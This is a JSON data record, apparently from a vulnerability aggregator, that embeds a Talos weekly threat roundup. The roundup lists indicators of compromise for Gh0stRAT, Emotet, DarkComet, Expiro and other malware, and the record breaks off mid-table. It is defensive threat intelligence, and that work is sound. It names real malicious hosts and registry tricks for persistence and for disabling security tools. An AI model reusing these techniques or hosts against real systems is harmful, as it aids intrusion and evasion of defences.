"DF00B503-1F21-5ABD-B713-1F79E4D1CB9A", "E22A392B-5D30-51F4-92ED-8E10BA7EE8D2", "E46AAFC9-276F-5161-B013-393D9A538259", "E5B0F794-87CD-5152-9D64-3AB23AF5C3EF", "E72D9129-EEED-5E3C-9CD8-9BD6201170C0", "E7B26D35-BAFD-51CB-BFAC-CA7E5EA5FA9A", "E8AD52BD-4EE5-5E85-91FE-66A868E0162B", "F5B92B0D-E802-5254-8668-D6A4B1DB8004", "F922DD70-E22B-5EBE-9CAE-410224E95831", "F9EF1801-C66C-572B-B67A-9A67E04D6B06", "FBB9B577-00A5-5C82-AFC5-4A52422056F3", "FE544217-2BB0-5C05-B26C-D14EE378E8A5", "FFBF7B7B-FFD8-5A32-89B0-AAB175FD2AE6", "FFF6224F-273A-5CB1-9421-833769E01519"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS"]}, {"type": "ics", "idList": ["ICSMA-20-049-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51"]}, {"type": "kaspersky", "idList": ["KLA11706"]}, {"type": "kitploit", "idList": ["KITPLOIT:102871766956097088", "KITPLOIT:1049860926455958760", "KITPLOIT:1225614657733366094", "KITPLOIT:1494860154339275183", "KITPLOIT:1844185171331211854", "KITPLOIT:1986765330027575502", "KITPLOIT:3080370456145673111", "KITPLOIT:3124960652240981745", "KITPLOIT:3245813529202482542", "KITPLOIT:3359946123198241398", "KITPLOIT:3397940664053959113", "KITPLOIT:3565898196234868215", "KITPLOIT:4205221140433081492", "KITPLOIT:43221571859278589", "KITPLOIT:5485948766090500662", "KITPLOIT:5528727998547000766", "KITPLOIT:5769166566971079899", "KITPLOIT:5896951739767119270", "KITPLOIT:6073614302403805969", "KITPLOIT:6082359615438809301", "KITPLOIT:6972580572774284552", "KITPLOIT:724832466163115459", "KITPLOIT:727243444931520192", "KITPLOIT:777119556142010019", "KITPLOIT:7915799087007906859", "KITPLOIT:8309365460568193500", "KITPLOIT:8418780960315245103", "KITPLOIT:998955151150716619"]}, {"type": "krebs", "idList": ["KREBS:C93CCA23099AC250E702848B49677D5B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:31DFC46E307127AF5C9FD13F15DF62DB"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0708"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7", "MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:6A6ED6A5B652378DCBA3113B064E973B"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994152", "MYHACK58:62201994153", "MYHACK58:62201994154", "MYHACK58:62201994162", "MYHACK58:62201994234", "MYHACK58:62201994259", "MYHACK58:62201994388", "MYHACK58:62201995523", "MYHACK58:62201995881"]}, {"type": "nessus", "idList": ["7286.PASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108611", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310815051", "OPENVAS:1361412562310815054"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153133"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "symantec", "idList": ["SMNTC-108273"]}, {"type": "talosblog", "idList": ["TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:71D138211697B43CB345A133B54BC824", "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878"]}, {"type": "thn", "idList": ["THN:1BA2E3EE721856ECEE43B825656909B0", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:65DE53134A31AE62D9634C0B4AA4E81B"]}, {"type": "threatpost", "idList": ["THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2"]}, {"type": "zdt", "idList": ["1337DAY-ID-32826"]}]}, "exploitation": null, "vulnersScore": 5.0}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"talosblog": [{"lastseen": "2019-09-13T22:32:07", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 6 and Sept. 13. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d7bff2f76fd0.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Dropper.Gh0stRAT-7155936-0 | Dropper | Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks. \nDoc.Downloader.Emotet-7155084-0 | Downloader | Emotet is a banking trojan that remains relevant due to its ability to evolve and bypass antivirus products. It is commonly spread via malicious email attachments and links. \nWin.Dropper.DarkComet-7154925-1 | Dropper | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system. \nWin.Virus.Expiro-7153559-0 | Virus | Expiro is a known file infector and information stealer that hinders analysis with anti-debugging and anti-analysis tricks. \nWin.Ransomware.Shade-7158472-0 | Ransomware | Shade, also known as Troldesh, is a ransomware family typically spread via malicious email attachments. \nWin.Packed.Tofsee-7150793-1 | Packed | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Dropper.Gh0stRAT-7155936-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BITS \nValue Name: Version ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BITS \nValue Name: Group ` | 24 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Lostlove_K ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\DEFGHI KLMNOPQR TUV \nValue Name: Description ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\DEFGHI KLMNOPQR TUV \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\DEFGHI KLMNOPQR TUV \nValue Name: DisplayName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\DEFGHI KLMNOPQR TUV \nValue Name: WOW64 ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\DEFGHI KLMNOPQR TUV \nValue Name: ObjectName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\DEFGHI KLMNOPQR TUV \nValue Name: ErrorControl ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: Description ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: ErrorControl ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: ImagePath ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: DisplayName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: WOW64 ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: ObjectName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS \nValue Name: Description ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS \nValue Name: ErrorControl ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS \nValue Name: ImagePath ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS \nValue Name: DisplayName ` | 1 \nMutexes | Occurrences \n---|--- \n`127.0.0.1` | 6 \n`Global\\f75b8341-d3d4-11e9-a007-00501e3ae7b5` | 4 \n`k.ru9999.cc` | 3 \n`45.114.11.137` | 2 \n`www.ddostmd.com` | 2 \n`www.3rbb.com` | 2 \n`116.31.125.147` | 1 \n`www.baidu.com` | 1 \n`www.hkdcr.com` | 1 \n`xiaoyuer3001.f3322.net` | 1 \n`222.186.30.211` | 1 \n`192.168.1.107` | 1 \n`mm.zhangfanfan.com` | 1 \n`shenxian2016.f3322.net` | 1 \n`admin860129.f3322.net` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`45[.]114[.]11[.]137` | 2 \n`154[.]210[.]146[.]138` | 2 \n`116[.]31[.]125[.]147` | 1 \n`61[.]147[.]103[.]67` | 1 \n`222[.]186[.]30[.]211` | 1 \n`23[.]238[.]148[.]74` | 1 \n`221[.]217[.]66[.]122` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`k[.]ru9999[.]cc` | 3 \n`www[.]3rbb[.]com` | 2 \n`WWW[.]DDOSTMD[.]COM` | 2 \n`WWW[.]HKDCR[.]COM` | 1 \n`xiaoyuer3001[.]f3322[.]net` | 1 \n`mm[.]zhangfanfan[.]com` | 1 \n`shenxian2016[.]f3322[.]net` | 1 \n`admin860129[.]f3322[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%ProgramFiles%\\svchost.exe` | 4 \n \n#### File Hashes\n\n` 121441b204dbf7a02c8f4357452c99592ab9bdeb676089ccf1f24071f740251b 130abeb252c2a663ae691271f5d154722468d1b1b2ed23ef89d4fb9290fe081b 1326c0b36ad655c1653ce78e98204260ec8b9bddefa3cd8d2c620fab88b1a83c 25effefec15971bbe5714e37fd1f0e0e33298c691b61d04ed3af1b1359731a2b 287fcc0ae4a50e34215cfd084570d7b94ab4a3786b7260ad0b1167d1baa1a8b0 29a7a1457008f729066e21c378ea7c402fac80aa64619631565fb95a4d137652 2eb388113d650745686345acf88d32a44975e00764034875bd990aa5a80119ca 2f6d822e2ebeb0f94368b55c7c94a4f8a8b73b32214fe1f3fc5277da52411bf9 332a58814dc69a08873cc8bcbf3f8b8999dd2e7ea60ad47b635a7f735e3e85a5 47bac35158a06f748621847c0de60eab92db067f0cb95f798f0b342f508f1360 4805d4e36186da1bca0b0debf28a36ff772885f0b438d3924059ef3b9531b2ca 4de97329b8242136094b16a705fa15d3a4fe918d68b1f4f698b58ba1bcb16706 4ec20ea729ca18bed34a0dbcd2b65f049d0926ab9f94a5470bb24e600e771281 592ebcaa26bacc775420398933a0a9d63acdaa604f85805a3a3196d5a1a798ee 5f2336bb4321161e7115e63d08db836ef28be2df0cad4db9e6ce45ad3830c560 5f469e2248ae56e1077c2c87a1a15c2414352a94786845d3b65447d3ee23694d 626d4dc26ff7ec588635ad32e71fabeb8ad96887d24498ffa08a031e1e6a6bee 66db565cad627dde60e4f396ef1712f06d7b911670189ab21b870ecaada99531 681539e7da26b1130fdb65c581f5146067a51c3a42849874d6f7aa189209a754 682cf9935d0d19815becc05f3f1ed6931396f25ccf95b6deedf70a4ba94ba031 70d32abf71be74690a04ebfe9713e2287106964e46069612f37f4b0822dd8169 7b32dce1d5818551afd3efdbc3ba540c47b37942d12254fc26f16b5e3f50b96e 81f4af297381141ed4990b4837b0fb60385f29405b04df3a55d8953237aa1182 84df0240ad79f34c7172b8262ec0898e794d2448e43b1e0a577704c0b8ef40e5 8ec17725347ae019a5d5d00345ba283483797e8477bd23e98f59d8c6f3d37811 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-_tjt54NmXbQ/XXwBQ0QNgKI/AAAAAAAACm4/yLgI6ETBz3UxbTvOXsTjdCI8Ij5rmuHxgCLcBGAsYHQ/s1600/4ec20ea729ca18bed34a0dbcd2b65f049d0926ab9f94a5470bb24e600e771281_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-0iObmS7DnOU/XXwBUqQdKoI/AAAAAAAACm8/CTgZ21bsgZI-_RL-Ai474gVsSSeT1zE0ACLcBGAsYHQ/s1600/4ec20ea729ca18bed34a0dbcd2b65f049d0926ab9f94a5470bb24e600e771281_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Downloader.Emotet-7155084-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 14 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`192[.]185[.]157[.]191` | 14 \n`152[.]160[.]245[.]7` | 14 \n`104[.]27[.]137[.]48` | 12 \n`104[.]27[.]136[.]48` | 12 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]w[.]org` | 14 \n`www[.]testrent[.]com` | 14 \n`lackify[.]com` | 14 \n`www[.]loris[.]al` | 14 \n`financialdiscourse[.]com` | 14 \n`fiberoptictestrentals[.]net` | 14 \n`INDHRIGROUP[.]COM` | 14 \n`loris[.]al` | 14 \n`testrent[.]com` | 14 \nFiles and or directories created | Occurrences \n---|--- \n`%LOCALAPPDATA%\\Microsoft\\Schemas\\MS Word_restart.xml` | 14 \n`%HOMEPATH%\\490.exe` | 14 \n \n#### File Hashes\n\n` 1157bbcfa2438b4142bc1dc163952714ef2e084cd27698f5c2f78193367f8033 3eaba85e842d0ed0489d430cb1bc37d1fca702845ba478a0e290115bebfd8827 64732ab1f700b865a24a0fe06e94a54a40724568af5381afd126096b59f18606 8ef79e33fc1ebf640f78cebe13485489f85caf08fbf4cee696aadb977f21d6e7 96ab8b7fc0b45cf2fc1277ad938ad4aabb1bcc157f0259e456b76f1684e4896e c177de169b84382b1809efd361d8e5a6ee6eff262f479724856686d03c6bb6db c707b20c85d03595b74a56768d69786c33076030059260a6684df7ac7b3a9562 cd75eda017abff329abfa5162be02c8042c86730dd948a6b423d3ebce5f5e3b8 e09474de88f323075c3ef4ba54c458e3275ee102b72a2bfc4894e79a9703c542 e192e2125ef244cff6787b3cba927d3e047fbd5d54dffd66d885a8c1789f2cde e79e52b33e81b6d039817aa3cf87726db6de496fcb36477f29483a5730dd2874 f256396752c6a4164b4097d493b202de43fb8f8d7bba372dcd7ba45ba3edfd16 f54ad758e4ee395a12956b665b611ad69b622e672d9f4086e8754f4b301cfb04 f679763abeea019bdfdc22e23d9be3159ca1f325453f34e94954bee50176664c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Uo1jBt5noJs/XXwBoNs0JbI/AAAAAAAACnI/vfymPbMw1TkjDLvPBXI6ma8FdjwUBVGNQCLcBGAsYHQ/s1600/f256396752c6a4164b4097d493b202de43fb8f8d7bba372dcd7ba45ba3edfd16_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Vnv01PkiKN8/XXwBvmAelUI/AAAAAAAACnM/F6PqInY2DPs-eLtrGWuzgUIqbk9D7NCwwCLcBGAsYHQ/s1600/f256396752c6a4164b4097d493b202de43fb8f8d7bba372dcd7ba45ba3edfd16_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-_ClhmaTr-8Y/XXwB0pSLLOI/AAAAAAAACnQ/1P4pHKcOjiAgQ1joICald2fVK2PsfPAVACLcBGAsYHQ/s1600/c707b20c85d03595b74a56768d69786c33076030059260a6684df7ac7b3a9562_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.DarkComet-7154925-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\DC3_FEXEC ` | 5 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: UserInit ` | 4 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DisableNotifications ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MicroUpdate ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: Policies ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: Policies ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableTaskMgr ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableRegistryTools ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{1Q4U2W04-714Q-L506-NR3K-B4MJ85W6X717} ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{1Q4U2W04-714Q-L506-NR3K-B4MJ85W6X717} \nValue Name: StubPath ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{7F0I7VXB-063R-XLLO-731N-3EGO8NDEDVOR} ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{7F0I7VXB-063R-XLLO-731N-3EGO8NDEDVOR} \nValue Name: StubPath ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{6C5V5081-L886-C7EB-2J6N-054ATGC34D64} ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\{6C5V5081-L886-C7EB-2J6N-054ATGC34D64} \nValue Name: StubPath ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: System ` | 1 \n`<HKCU>\\SOFTWARE\\TGB61 ` | 1 \n`<HKCU>\\SOFTWARE\\TGB61 \nValue Name: FirstExecution ` | 1 \n`<HKCU>\\SOFTWARE\\TGB61 \nValue Name: NewIdentification ` | 1 \nMutexes | Occurrences \n---|--- \n`DC_MUTEX-F3XDA2D` | 5 \n`_x_X_BLOCKMOUSE_X_x_` | 4 \n`_x_X_PASSWORDLIST_X_x_` | 4 \n`_x_X_UPDATE_X_x_` | 4 \n`DCPERSFWBP` | 3 \n`***MUTEX***` | 2 \n`***MUTEX***_SAIR` | 2 \n`054ATGC34D64` | 1 \n`\\BaseNamedObjects\\054ATGC34D64_SAIR` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`193[.]161[.]193[.]99` | 2 \n`92[.]44[.]166[.]32` | 1 \n`81[.]214[.]120[.]214` | 1 \n`88[.]229[.]213[.]118` | 1 \n`176[.]219[.]165[.]9` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`hackroot00[.]ddns[.]net` | 1 \n`berkeaksoy-45595[.]portmap[.]host` | 1 \n`metin2ci[.]duckdns[.]org` | 1 \n`toxicwithahmet[.]duckdns[.]org` | 1 \n`denememusareis[.]duckdns[.]org` | 1 \n`blackhamdsnh[.]duckdns[.]org` | 1 \n`bluejeans067-51471[.]portmap[.]io` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\dclogs` | 5 \n`%TEMP%\\XX--XX--XX.txt` | 3 \n`%TEMP%\\UuU.uUu` | 3 \n`%TEMP%\\XxX.xXx` | 3 \n`%APPDATA%\\logs.dat` | 3 \n`%HOMEPATH%\\Documents\\MSDCSC` | 2 \n`%HOMEPATH%\\Documents\\MSDCSC\\msdcsc.exe` | 2 \n`%System32%\\MSDCSC\\msdcsc.exe` | 1 \n`%SystemRoot%\\SysWOW64\\MSDCSC` | 1 \n`%ProgramData%\\Microsoft\\Windows\\Start Menu\\MSDCSC` | 1 \n`%ProgramData%\\Microsoft\\Windows\\Start Menu\\MSDCSC\\msdcsc.exe` | 1 \n`\\dir` | 1 \n`\\dir\\install` | 1 \n`\\dir\\install\\install` | 1 \n`\\dir\\install\\install\\server.exe` | 1 \n`%SystemRoot%\\SysWOW64\\install` | 1 \n`%SystemRoot%\\SysWOW64\\install\\server.exe` | 1 \n`%SystemRoot%\\SysWOW64\\MSDCSC\\msdcsc.exe` | 1 \n`%HOMEPATH%` | 1 \n`%HOMEPATH%\\Desktop` | 1 \n`%HOMEPATH%\\Desktop\\Yeni klas\u00f6r` | 1 \n`%HOMEPATH%\\Desktop\\Yeni klas\u00f6r\\install` | 1 \n`%HOMEPATH%\\Desktop\\Yeni klas\u00f6r\\install\\server.exe` | 1 \n`%TEMP%\\YOUS2.DCP` | 1 \n`%TEMP%\\SDQWEQ.EXE` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 08c0ff2a95d50cd94b1f5f58b3af99091d27490f949c0d3c68dbc81dec5f9171 190b08b1337d404696b0c91f0442d31149080c97b7a6fe13cf879b1a4ead4c94 3f74c0ebf0701b6726ddb4fdc6ddb15610d0075691b02e9615c50e095359b6c2 4627deb7f9e82a06051ba5594b681756003b97c5a9fadec91ec4af3d9ac9ed72 54ade3e9aa6cc71cb769eb69a65110f5fa5cdac93cbf20b82609b996bfaf76ca 611d5155f8e505c20f5d1e2bb70b37b84d7de3458577d89cc32dc12f0351ec95 988e7312821405d692b5b5846be7ede45f0d8bd23c914385a737efa0400f2bad 9cb46d011f79a6db1c6baef5b9cae3020166a515dff284fcd6ea2fb51da1cf1d a5f9af2d94dd64d9c05e56d9560c386081823a69823d8609501f1506ab5d7a1a a919a95c83a233542e5da375487e6fabb1b81157c8f5bb372e12bebad910b170 e586a39a113c6c49b096ff19519e822f736d06c805a01eaed6adee2ab5a5836c f2ae8953fa9406d5f746ff92b94dfc1d0d09378f12372a71ef07c98f94167317 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-1RvTbG3vMU8/XXwCQCoKxSI/AAAAAAAACng/MTOlBFK0lLoN88OC8_5CHB5fFPcez3LmgCLcBGAsYHQ/s1600/4627deb7f9e82a06051ba5594b681756003b97c5a9fadec91ec4af3d9ac9ed72_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-nfV5LcgmSsA/XXwCUZvSjMI/AAAAAAAACnk/h4Y0eOfoK3YUQNgJ7-QupZLinGf9LX53wCLcBGAsYHQ/s1600/4627deb7f9e82a06051ba5594b681756003b97c5a9fadec91ec4af3d9ac9ed72_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Virus.Expiro-7153559-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 18 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_32 \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_64 \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Type ` | 18 